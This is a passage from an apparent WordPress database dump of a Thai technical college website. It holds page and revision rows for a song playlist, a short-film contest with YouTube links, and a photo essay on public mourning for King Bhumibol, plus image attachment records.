<li>รอยเท้า ที่พ่อเดิน-พลายงาม<span style=\"color: #ff0000;\"><em> 03:19:26</em></span></li>\n <li>รอยเท้าพ่อ-ใบไม้สีแดง <span style=\"color: #ff0000;\"><em>03:23:45</em></span></li>\n <li>ระหว่างทาง -Black Tree <em><span style=\"color: #ff0000;\">03:27:17</span></em></li>\n <li>รักพ่อ - BAD DNA <em><span style=\"color: #ff0000;\">03:32:18</span></em></li>\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง - Live and Learn<em><span style=\"color: #ff0000;\"> 03:35:47</span></em></li>\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง - รักพ่อต้องรักกัน <span style=\"color: #ff0000;\"><em>03:39:18</em></span></li>\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง - ศรัทธา <em><span style=\"color: #ff0000;\">03:43:19</span></em></li>\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง[เพลงพระราชนิพนธ์] - ชะตาชีวิต <em><span style=\"color: #ff0000;\">03:47:33</span></em></li>\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง[เพลงพระราชนิพนธ์] - บัวขาว 03:49:59</li>\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง[เพลงพระราชนิพนธ์] - สายฝน 03:53:55</li>\n <li>ศรัทธา-Past of the pain 03:56:52</li>\n <li>สมัยไหนนิยม เพลง มิใช่อ่อนแอ 04:03:32</li>\n <li>สัตว์ป่า - BABYLON BK 04:07:50</li>\n <li>สิงโต นำโชค - รักเพื่อพ่อ 04:09:39</li>\n <li>สุดท้ายคือรางวัล จากผ่านภพ-เฉลิมบัวทิพย์ ไทยเเลน์กอต 04:12:52</li>\n <li>หน้าที่ของตน-หนึ่ง smile buffalo 04:15:34</li>\n <li>ห่างไกล ใจยังห่วง-CobraK 04:20:07</li>\n <li>ให้คงอยู่-Sao Moonlight Gypsy 04:22:13</li>\n <li>อยากให้พ่อกลับมา-นายเสียง ประตูเปิด 04:25:57</li>\n <li>โอ้พระคืนสรวง [Rock Version] - แตงโม Lost Ferrari 04:29:55</li>\n <li>โอ้พระคืนสรวง-CU Chorus 04:33:32</li>\n</ol>', '\"แต่งเพลงเพื่อพ่อ\"', '', 'inherit', 'closed', 'closed', '', '4473-autosave-v1', '', '', '2018-11-15 10:29:02', '2018-11-15 03:29:02', '', 4473, 'http://www.technicrayong.ac.th/4473-autosave-v1/', 0, 'revision', '', 0),
(4478, 3, '2018-11-14 11:28:41', '2018-11-14 04:28:41', 'https://youtu.be/GwqyX1Gk5N0\r\n\r\nhttps://youtu.be/T10s06PGMHI\r\n\r\nhttps://youtu.be/ckSfZebcsik\r\n\r\nhttps://youtu.be/E74lDuIBBQA\r\n\r\nhttps://youtu.be/4KA6AsI33Z0\r\n\r\nhttps://youtu.be/riq-rXXRrho\r\n\r\nhttps://youtu.be/l2WJsXiMBDw\r\n\r\nhttps://youtu.be/HL5n3aSpNCA\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประกวดหนังสั้น \"อาชีวะทำดีเพื่อพ่อ\"', '', 'publish', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%ab%e0%b8%99%e0%b8%b1%e0%b8%87%e0%b8%aa%e0%b8%b1%e0%b9%89%e0%b8%99-%e0%b8%ad%e0%b8%b2%e0%b8%8a%e0%b8%b5%e0%b8%a7%e0%b8%b0%e0%b8%97', '', '', '2018-11-15 13:59:58', '2018-11-15 06:59:58', '', 0, 'http://www.technicrayong.ac.th/?page_id=4478', 0, 'page', '', 0),
(4479, 3, '2018-11-14 11:28:41', '2018-11-14 04:28:41', '', 'ประกวดหนังสั้น \"อาชีวะทำดีเพื่อพ่อ\"', '', 'inherit', 'closed', 'closed', '', '4478-revision-v1', '', '', '2018-11-14 11:28:41', '2018-11-14 04:28:41', '', 4478, 'http://www.technicrayong.ac.th/4478-revision-v1/', 0, 'revision', '', 0),
(4480, 3, '2018-11-15 13:52:04', '2018-11-15 06:52:04', 'https://youtu.be/GwqyX1Gk5N0\n\nhttps://youtu.be/T10s06PGMHI\n\nhttps://youtu.be/ckSfZebcsik\n\nhttps://youtu.be/E74lDuIBBQA\n\nhttps://youtu.be/4KA6AsI33Z0\n\nhttps://youtu.be/riq-rXXRrho\n\nhttps://youtu.be/l2WJsXiMBDw\n\nhttps://youtu.be/HL5n3aSpNCA\n\n \n\n \n\n \n\n \n\n \n\n ', 'ประกวดหนังสั้น \"อาชีวะทำดีเพื่อพ่อ\"', '', 'inherit', 'closed', 'closed', '', '4478-autosave-v1', '', '', '2018-11-15 13:52:04', '2018-11-15 06:52:04', '', 4478, 'http://www.technicrayong.ac.th/4478-autosave-v1/', 0, 'revision', '', 0),
(4482, 3, '2018-11-14 11:38:13', '2018-11-14 04:38:13', '<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">ภายในพิธีสวดเจริญพระพุทธมนต์เจริญชัยมงคลคาถา</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4485\" src=\"/wp-content/uploads/2018/11/5-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\"> ถวายพระพรสมเด็จพระบรมโอรสาธิราช เจ้าฟ้ามหาวชิราลงกรณ สยามกุฎราชกุมาร ขึ้นทรงราชย์สืบราชสันตติวงศ์เป็นพระมหากษัตริย์ รัชกาลที่ ๑๐ วันที่ ๑ ธันวาคม พ.ศ. ๒๕๕๙ ณ วัดบวรนิเวศวิหารที่พระองค์เสด็จประทับเมื่อทรงผนวช เมื่อปี พ.ศ. 2512</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ดาโต๊ะ ดร.เฟาซัน หลังปูเต๊ะ และพี่น้องมุสลิม\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4486\" src=\"/wp-content/uploads/2018/11/11-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">“ชุมชนมัสยิดต้นสน” ร่วมกันทําพิธีสวดดุอาอ์ถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ชุมชนมุสลิมเก่าแก่ย่านบางกอกใหญ่แห่งนี้ครั้งหนึ่งกษัตริย์สองพี่น้อง ในหลวงรัชกาลที่ 8 และในหลวงรัชกาลที่ 9 เคยเสด็จเยี่ยมเป็นการส่วนพระองค์</p>\r\n<img class=\"aligncenter size-large wp-image-4487\" src=\"/wp-content/uploads/2018/11/14-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">พ่อค้าแม่ค้าชุมชนชาวปากคลองตลาด ร่วมกันจัดซุ้มดอกไม้และจุดเทียนน้อมถวายอาลัยในวันที่ 5 ธันวาคม พ.ศ. ๒๕๕๙ ซึ่งเป็นวันคล้ายวันพระราชสมภพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมทางเท้า ปากคลองตลาด กรุงเทพฯ</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">นักศึกษาภาควิชาวิจิตรศิลป์ คณะสถาปัตยกรรมศาสตร์</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4488\" src=\"/wp-content/uploads/2018/11/18-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">สถาบันเทคโนโลยีพระจอมเกล้าเจ้าคุณทหารลาดกระบัง ร่วมกันวาดพระบรมสาทิสลักษณ์ของในหลวงรัชกาลที่ 9 พร้อมน้อมนําพระราชดํารัส “เสียใจได้ แต่อย่าละเลยหน้าที่” มาเขียนประกอบภาพวาดด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">มูลนิธิพระคชบาล ได้นําช้าง 11 เชือก จากวังช้างอยุธยา</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4490\" src=\"/wp-content/uploads/2018/11/19-Chanklang-Kanthong-copy-1024x581.jpg\" alt=\"\" width=\"640\" height=\"363\" />\r\n<p style=\"text-align: center;\">พร้อมด้วยควาญช้างกลุ่มคชสารราว 200 คน เดินทางไปถวายความอาลัย และสักการะพระบรมศพ พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณหน้าประตูมณีนพรัตน์ พระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“มอเตอร์ไซค์จิตอาสา”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4491\" src=\"/wp-content/uploads/2018/11/22-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">มอเตอร์ไซค์จิตอาสาให้บริการรับ-ส่งฟรี สําหรับประชาชนที่เดินทางมาถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ณ บริเวณโดยรอบสนามหลวง “ตั้งใจจะมาจนกว่าจะเสร็จพระราชพิธีถวายพระเพลิงพระบรมศพเลยครับ” จิตอาสารายหนึ่งกล่าว</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“จุฬาฯ เทิด ธ พระภูมิพล”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4492\" src=\"/wp-content/uploads/2018/11/25-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">แพทย์ พยาบาล และบุคลากรจากคณะแพทยศาสตร์ จุฬาลงกรณ์มหาวิทยาลัยและโรงพยาบาลจุฬาลงกรณ์ จุดเทียนถวายอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n<img class=\"aligncenter size-large wp-image-4493\" src=\"/wp-content/uploads/2018/11/31-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">นางไพเราะ เยอเบาะ หญิงชาวอาข่า หนึ่งใน 999 คน จาก 9 ชนเผ่าที่สูงที่เข้าถวายสักการะพระบรมศพ ณ พระที่นั่งดุสิตมหาปราสาท ได้โชว์เหรียญพระราชทานเพื่อใช้แทนบัตรประชาชนในอดีต จากในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">เจ้าหน้าที่พยาบาลพยุงนักเรียนพยาบาลที่มาร่วมงาน “จุฬาฯ เทิด ธ พระภูมิพล”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4494\" src=\"/wp-content/uploads/2018/11/33-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">จัดขึ้นโดย โรงพยาบาลจุฬาลงกรณ์ สภากาชาดไทย ร่วมกับคณะแพทยศาสตร์ จุฬาลงกรณ์มหาวิทยาลัย เพื่อรําลึกถึงพระมหากรุณาธิคุณพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ ลานหน้าพระบรมราชานุสาวรีย์ รัชกาลที่ ๖ สวนลุมพินี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ทําดีเพื่อพ่อ”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4495\" src=\"/wp-content/uploads/2018/11/40-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">ธวิน ปินะถา หรือ “เพ็ชรน้อยหัวใจเพชร”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4496\" src=\"/wp-content/uploads/2018/11/46-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ชายหนุ่มขาพิการทั้งสองข้าง เดินทางจากบ้านเกิดในจังหวัดมหาสารคามมายังพระบรมมหาราชวังด้วยความมุ่งมั่นอุตสาหะเป็นระยะทางกว่า 500 กิโลเมตร ด้วยจักรยานคู่ชีพที่ประกอบขึ้นเอง เพื่อมาสักการะพระบรมศพ</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“บนเส้นทาง คําสอนของพ่อ 70 ปี ที่ครองราชย์”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4497\" src=\"/wp-content/uploads/2018/11/47-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter size-large wp-image-4498\" src=\"/wp-content/uploads/2018/11/48-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ประชาชนต่างพากันเข้าไปสัมผัสเปลือกไม้จันทน์หอม แล้วนํามาแตะหน้าผากของตนเพื่อความเป็นสิริมงคล ขณะเข้าร่วมพิธีบวงสรวงตัดไม้จันทน์หอม 12 ต้น ที่ยืนต้นตายธรรมชาติในพื้นที่อุทยานแห่งชาติกุยบุรี จังหวัดประจวบคีรีขันธ์เพื่อนํามาจัดสร้างพระโกศทรงพระบรมศพเหนือพระจิตกาธานบนพระเมรุมาศ ในงานพระราชพิธีถวายพระเพลิงพระบรมศพ พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">ประชาชนร่วมจุดเทียนแสดงความอาลัย ณ โรงพยาบาลศิริราช</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4499\" src=\"/wp-content/uploads/2018/11/61-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">เพื่อถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เสด็จสวรรคตครบ 1 เดือน</p>\r\n<img class=\"aligncenter size-large wp-image-4500\" src=\"/wp-content/uploads/2018/11/82-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">พ่อค้าแม่ค้าชุมชนชาวปากคลองตลาด ร่วมกันจัดซุ้มดอกไม้ และจุดเทียนน้อมถวายความอาลัยในวันที่ 5 ธันวาคม พ.ศ. 2559 ซึ่งเป็นวันคล้ายวันพระราชสมภพของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมทางเท้า ปากคลองตลาด กรุงเทพมหานคร</p>\r\n<img class=\"aligncenter size-large wp-image-4501\" src=\"/wp-content/uploads/2018/11/83-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">เจ้าหน้าที่วัดบวรนิเวศวิหาร ลั่นฆ้องตีกลองก่อนที่พระภิกษุจะประกอบพิธีสวดเจริญพระพุทธมนต์ เจริญชัยมงคลคาถา ถวายพระพรสมเด็จพระบรมโอรสาธิราช เจ้าฟ้ามหาวชิราลงกรณ สยามมกุฎราชกุมาร ขึ้นทรงราชย์สืบราชสันตติวงศ์เป็ นพระมหากษัตริย์รัชกาลที่ ๑๐ วันที่ ๑ ธันวาคม พ.ศ. ๒๕๕๙</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">ข้าราชการ ประชาชน และนักเรียนนักศึกษาต่างรวมตัวกัน</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4502\" src=\"/wp-content/uploads/2018/11/84-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">เป็นจิตอาสา เพื่อร่วมทําความดีถวายเป็นพระราชกุศลแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ในภาพเป็นการให้บริการตัดผมฟรีที่บริเวณสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">พิพิธภัณฑ์รถโบราณ “เจษฎาเทคนิคมิวเซียม”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4503\" src=\"/wp-content/uploads/2018/11/85-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">นํารถโบราณมารับส่งประชาชนในเส้นทางรอบสนามหลวงโดยไม่คิดค่าบริการ เพื่อร่วมทําความดีถวาย แด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“รวมใจอาสา ทําดีเพื่อพ่อ”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4504\" src=\"/wp-content/uploads/2018/11/86-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter size-large wp-image-4505\" src=\"/wp-content/uploads/2018/11/88-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ร้านขายเสื้อผ้าเกือบทุกร้านในย่านบางลําพู นําเสื้อผ้าสีดําและสีขาวมาวางจําหน่าย</p>\r\n<img class=\"aligncenter size-large wp-image-4506\" src=\"/wp-content/uploads/2018/11/89-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ชายเจ้าของร้านค้าแห่งหนึ่งในบริเวณแยกสะพานเฉลิมวันชาติ เขตพระนคร นําพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 10 ออกมาตั้งหน้าร้าน เช่นเดียวกับร้านค้าอีกหลายแห่งในย่านนี้ที่จําหน่ายสินค้าซึ่งเกี่ยวข้องกับสถาบันพระมหากษัตริย์ เช่น ธงชาติ ธงเฉลิมพระเกียรติ ภาพของพระบรมวงศานุวงศ์ที่เริ่มนําพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 10 ออกมาตั้งโชว์และจําหน่ายมากขึ้น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“วันที่ 100”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4507\" src=\"/wp-content/uploads/2018/11/90-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter size-large wp-image-4508\" src=\"/wp-content/uploads/2018/11/94-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">พนักงานต้อนรับหญิงในสถานบันเทิงย่านอโศกหรือที่รู้จักกันว่า “ซอยคาวบอย” ร่วมใจกันสวมชุดสีดํา เช่นเดียวกับร้านต่าง ๆ ที่ลดป้ายแสงสีลงเพื่อเป็นการถวายความไว้อาลัยแด่ในหลวงรัชกาลที่ 9 เป็นระยะเวลา 1 เดือน</p>\r\n<img class=\"aligncenter size-large wp-image-4509\" src=\"/wp-content/uploads/2018/11/98-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter size-large wp-image-4510\" src=\"/wp-content/uploads/2018/11/99-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n ', 'ภาพถ่าย โดย จันทร์กลาง กันทอง', '', 'publish', 'closed', 'closed', '', '%e0%b8%a0%e0%b8%b2%e0%b8%9e%e0%b8%96%e0%b9%88%e0%b8%b2%e0%b8%a2-%e0%b9%82%e0%b8%94%e0%b8%a2-%e0%b8%88%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b9%8c%e0%b8%81%e0%b8%a5%e0%b8%b2%e0%b8%87-%e0%b8%81', '', '', '2018-11-15 13:54:35', '2018-11-15 06:54:35', '', 0, 'http://www.technicrayong.ac.th/?page_id=4482', 0, 'page', '', 0),
(4483, 3, '2018-11-14 11:38:13', '2018-11-14 04:38:13', '', 'ภาพถ่าย โดย จันทร์กลาง กันทอง', '', 'inherit', 'closed', 'closed', '', '4482-revision-v1', '', '', '2018-11-14 11:38:13', '2018-11-14 04:38:13', '', 4482, 'http://www.technicrayong.ac.th/4482-revision-v1/', 0, 'revision', '', 0),
(4485, 3, '2018-11-14 11:45:17', '2018-11-14 04:45:17', '', '5-Chanklang Kanthong copy', '', 'inherit', 'closed', 'closed', '', '5-chanklang-kanthong-copy', '', '', '2018-11-14 11:45:17', '2018-11-14 04:45:17', '', 4482, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/5-Chanklang-Kanthong-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4486, 3, '2018-11-14 11:45:32', '2018-11-14 04:45:32', '', '11-Chanklang Kanthong copy', '', 'inherit', 'closed', 'closed', '', '11-chanklang-kanthong-copy', '', '', '2018-11-14 11:45:32', '2018-11-14 04:45:32', '', 4482, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/11-Chanklang-Kanthong-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4487, 3, '2018-11-14 11:46:30', '2018-11-14 04:46:30', '', '14-Chanklang Kanthong copy', '', 'inherit', 'closed', 'closed', '', '14-chanklang-kanthong-copy', '', '', '2018-11-14 11:46:30', '2018-11-14 04:46:30', '', 4482, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/14-Chanklang-Kanthong-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4488, 3, '2018-11-14 11:46:50', '2018-11-14 04:46:50', '', '18-Chanklang Kanthong copy', '', 'inherit', 'closed', 'closed', '', '18-chanklang-kanthong-copy', '', '', '2018-11-15 13:09:08', '2018-11-15 06:09:08', '', 4482, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/18-Chanklang-Kanthong-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4489, 3, '2018-11-14 11:46:59', '2018-11-14 04:46:59', 'https://youtu.be/GwqyX1Gk5N0\r\n\r\n ', 'ประกวดหนังสั้น \"อาชีวะทำดีเพื่อพ่อ\"', '', 'inherit', 'closed', 'closed', '', '4478-revision-v1', '', '', '2018-11-14 11:46:59', '2018-11-14 04:46:59', '', 4478, 'http://www.technicrayong.ac.th/4478-revision-v1/', 0, 'revision', '', 0),
(4490, 3, '2018-11-14 11:47:01', '2018-11-14 04:47:01', '', '19-Chanklang Kanthong copy', '', 'inherit', 'closed', 'closed', '', '19-chanklang-kanthong-copy', '', '', '2018-11-14 11:47:01', '2018-11-14 04:47:01', '', 4482, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/19-Chanklang-Kanthong-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4491, 3, '2018-11-14 11:47:22', '2018-11-14 04:47:22', '', '22-Chanklang Kanthong copy', '', 'inherit', 'closed', 'closed', '', '22-chanklang-kanthong-copy', '', '', '2018-11-14 11:47:22', '2018-11-14 04:47:22', '', 4482, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/22-Chanklang-Kanthong-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4492, 3, '2018-11-14 11:47:35', '2018-11-14 04:47:35', '', '25-Chanklang Kanthong copy', '', 'inherit', 'closed', 'closed', '', '25-chanklang-kanthong-copy', '', '', '2018-11-14 11:47:35', '2018-11-14 04:47:35', '', 4482, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/25-Chanklang-Kanthong-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4493, 3, '2018-11-14 11:47:47', '2018-11-14 04:47:47', '', '31-Chanklang Kanthong copy', '', 'inherit', 'closed', 'closed', '', '31-chanklang-kanthong-copy', '', '', '2018-11-14 11:47:47', '2018-11-14 04:47:47', '', 4482, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/31-Chanklang-Kanthong-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4494, 3, '2018-11-14 11:48:05', '2018-11-14 04:48:05', '', '33-Chanklang Kanthong copy', '', 'inherit', 'closed', 'closed', '', '33-chanklang-kanthong-copy', '', '', '2018-11-14 11:48:05', '2018-11-14 04:48:05', '', 4482, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/33-Chanklang-Kanthong-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4495, 3, '2018-11-14 11:48:19', '2018-11-14 04:48:19', '', '40-Chanklang Kanthong copy', '', 'inherit', 'closed', 'closed', '', '40-chanklang-kanthong-copy', '', '', '2018-11-14 11:48:19', '2018-11-14 04:48:19', '', 4482, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/40-Chanklang-Kanthong-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4496, 3, '2018-11-14 11:48:33', '2018-11-14 04:48:33', '', '46-Chanklang Kanthong copy', '', 'inherit', 'closed', 'closed', '', '46-chanklang-kanthong-copy', '', '', '2018-11-14 11:48:33', '2018-11-14 04:48:33', '', 4482, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/46-Chanklang-Kanthong-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4497, 3, '2018-11-14 11:48:48', '2018-11-14 04:48:48', '', '47-Chanklang Kanthong copy', '', 'inherit', 'closed', 'closed', '', '47-chanklang-kanthong-copy', '', '', '2018-11-14 11:48:48', '2018-11-14 04:48:48', '', 4482, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/47-Chanklang-Kanthong-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4498, 3, '2018-11-14 11:49:09', '2018-11-14 04:49:09', '', '48-Chanklang Kanthong copy', '', 'inherit', 'closed', 'closed', '', '48-chanklang-kanthong-copy', '', '', '2018-11-14 11:49:09', '2018-11-14 04:49:09', '', 4482, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/48-Chanklang-Kanthong-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4499, 3, '2018-11-14 11:49:23', '2018-11-14 04:49:23', '', '61-Chanklang Kanthong copy', '', 'inherit', 'closed', 'closed', '', '61-chanklang-kanthong-copy', '', '', '2018-11-14 11:49:23', '2018-11-14 04:49:23', '', 4482, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/61-Chanklang-Kanthong-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4500, 3, '2018-11-14 11:49:43', '2018-11-14 04:49:43', '', '82-Chanklang Kanthong copy', '', 'inherit', 'closed', 'closed', '', '82-chanklang-kanthong-copy', '', '', '2018-11-14 11:49:43', '2018-11-14 04:49:43', '', 4482, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/82-Chanklang-Kanthong-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4501, 3, '2018-11-14 11:50:00', '2018-11-14 04:50:00', '', '83-Chanklang Kanthong copy', '', 'inherit', 'closed', 'closed', '', '83-chanklang-kanthong-copy', '', '', '2018-11-14 11:50:00', '2018-11-14 04:50:00', '', 4482, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/83-Chanklang-Kanthong-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4502, 3, '2018-11-14 11:50:12', '2018-11-14 04:50:12', '', '84-Chanklang Kanthong copy', '', 'inherit', 'closed', 'closed', '', '84-chanklang-kanthong-copy', '', '', '2018-11-14 11:50:12', '2018-11-14 04:50:12', '', 4482, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/84-Chanklang-Kanthong-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4503, 3, '2018-11-14 11:50:53', '2018-11-14 04:50:53', '', '85-Chanklang Kanthong copy', '', 'inherit', 'closed', 'closed', '', '85-chanklang-kanthong-copy', '', '', '2018-11-14 11:50:53', '2018-11-14 04:50:53', '', 4482, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/85-Chanklang-Kanthong-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4504, 3, '2018-11-14 11:51:24', '2018-11-14 04:51:24', '', '86-Chanklang Kanthong copy', '', 'inherit', 'closed', 'closed', '', '86-chanklang-kanthong-copy', '', '', '2018-11-14 11:51:24', '2018-11-14 04:51:24', '', 4482, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/86-Chanklang-Kanthong-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4505, 3, '2018-11-14 11:51:43', '2018-11-14 04:51:43', '', '88-Chanklang Kanthong copy', '', 'inherit', 'closed', 'closed', '', '88-chanklang-kanthong-copy', '', '', '2018-11-14 11:51:43', '2018-11-14 04:51:43', '', 4482, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/88-Chanklang-Kanthong-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
